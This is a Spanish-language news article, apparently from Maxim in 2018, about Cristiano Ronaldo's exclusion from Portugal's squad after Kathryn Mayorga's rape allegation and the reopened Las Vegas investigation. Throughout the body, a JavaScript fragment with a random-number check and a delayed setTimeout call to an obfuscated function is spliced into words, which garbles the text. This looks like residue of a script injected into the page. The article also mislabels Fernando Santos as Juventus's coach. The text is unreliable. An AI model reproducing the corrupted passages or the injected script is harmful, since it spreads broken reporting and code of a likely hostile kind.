Cristiano Ronaldo no jugará los próximos 4 partidos de Portugal por acusación de violación

    Cristiano Ronaldo no jugará los próximos 4 partidos de Portugal por acusación de violación

    «Niego firmemente las acusaciones que se emiten contra mí» dijo Cristiano Ronaldo.

    Autor: Redacción Maxim 4 octubre, 2018


    FOTO: GettyImages

    La superestrella del fútbol Cristiano Ronaldo ha sido acusado de cometer una violación, y la acusación ya está afectandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando su carrera. La superestrella de la Juventus está fuera de la lista para los próximos cuatro juegos de Portugal.

    A pesar de querer tirar a Ronaldo, ESPN informa que el entrenador de la Juventus, Fernandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Santos, defendió a su jugador estrella contra las acusaciones, que han perseguido a Ronaldo después de que sus abogados resolvieron el caso hace nueve años.

     

     

     

    The Guardian informó sobre reclamos presentados por una mujer llamada Kathryn Mayorga.

    Según Mayorga, conoció a Ronaldo en un club de Las Vegas en 2009 y supuestamente él la violó en una habitación del hotel. Los abogados de Ronaldo finalmente negociaron un pago de $375,000 y un acuerdo de no divulgación. Inspirada por el movimiento #Metoo, Mayorga anuló la NDA y eligió hacer pública su acusación.

    Los abogados de Mayorga dicen que ella sufrió significativamente por el presunto asalto y por presentarse:

     

    Sus abogados agregaron que Mayorga abandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andonó Las Vegas para escapar de la atención en su caso, y agregó que el presunto caso le ha causado graves daños mentales y emocionales. Ella no estuvo en la conferencia de prensa.

    «Ella ha decidido no ponerse a disposición de los medios de comunicación y mantenerse fuera del público debido a su estado emocional», dijo Stovall. «No es agradable para ella».

    Sus abogados agregaron que están considerandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la posibilidad de divulgar los documentos que se relacionan con el caso, incluidos informes policiales, registros médicos y un acuerdo extrajudicial que aparentemente incluyó un acuerdo de no divulgación sobre el incidente. Afirmaron que un psiquiatra ha determinado que sufre estrés post-traumático y depresión debido al supuesto ataque de 2009 en Las Vegas.

     


    Ronaldo publicó un tweet negandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando cualquier delito y declarandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando que la violación es «un crimen abominable» con esta afirmación.

     

     

     

    El informe de The Guardian termina con una nota ominosa. Según informes, la policía de Las Vegas dijo que «a partir de septiembre de 2018, el caso ha sido reabierto y nuestros detectives están haciendo un seguimiento de la información que se proporciona».

    A pesar de la ausencia de Ronaldo de los próximos partidos, el entrenador Santos dijo que «nada va a impedir que Ronaldo esté en el equipo».

    Esto está lejos de terminar, y podría tener un impacto duradero en la carrera de Ronaldo, incluso si finalmente es exonerado.

     

     

    En otras noticias de futbol, te dejamos los mejores goles de chilena.

     

    Temas relacionados con esta nota: , , , ,

«Niego firmemente las acusaciones que se emiten contra mí» dijo Cristiano Ronaldo.